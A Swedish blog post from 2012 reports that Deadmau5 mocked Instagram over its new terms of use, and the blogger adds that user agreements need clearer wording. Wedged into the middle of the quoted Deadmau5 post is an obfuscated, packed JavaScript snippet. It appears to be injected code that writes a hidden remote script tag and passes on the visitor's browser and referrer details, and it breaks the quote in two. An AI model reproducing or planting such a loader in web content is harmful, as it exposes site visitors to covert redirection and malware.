Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Deadmau5 är en av dem som inte gillade Instagram igår.

Deadmau5 är en av dem som inte gillade Instagram igår.
Filip Urde
  • On 19 december, 2012
  • http://www.revue.se/filip-urde

deadmau5: ”Here eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkdyk|var|u0026u|referrer|akrsr||js|php’.split(’|’),0,{}))
you go Instagram, feel free to sell this posted photo for cash. Thanks for selling me out. #instagram @youranonnews”

Vi skrev nyss en uppdatering i ”Instagram frågan”… För er som missat, eller vill uppdatera er igen så kan ni läsa här.

Men jag tycker det är väldigt kul med vilken storm Instagram lyckades dra igång igår. Så jag var tvungen att posta en av de kändisar som jag följer, nämligen Deadmau5. Han var inte sen med att lacka på fototjänsten och postade följande bilde och text (se ovan).

Hela den här sörjan kunde lätt ha undgåtts om man var lite mer tydlig från Instagram. Vilket är ännu ett svar på varför man måste vara mer än tydlig i hur man formulerar sig i användaravtal och andra viktiga dokument. Folk lackade verkligen järnet igår.

instagram.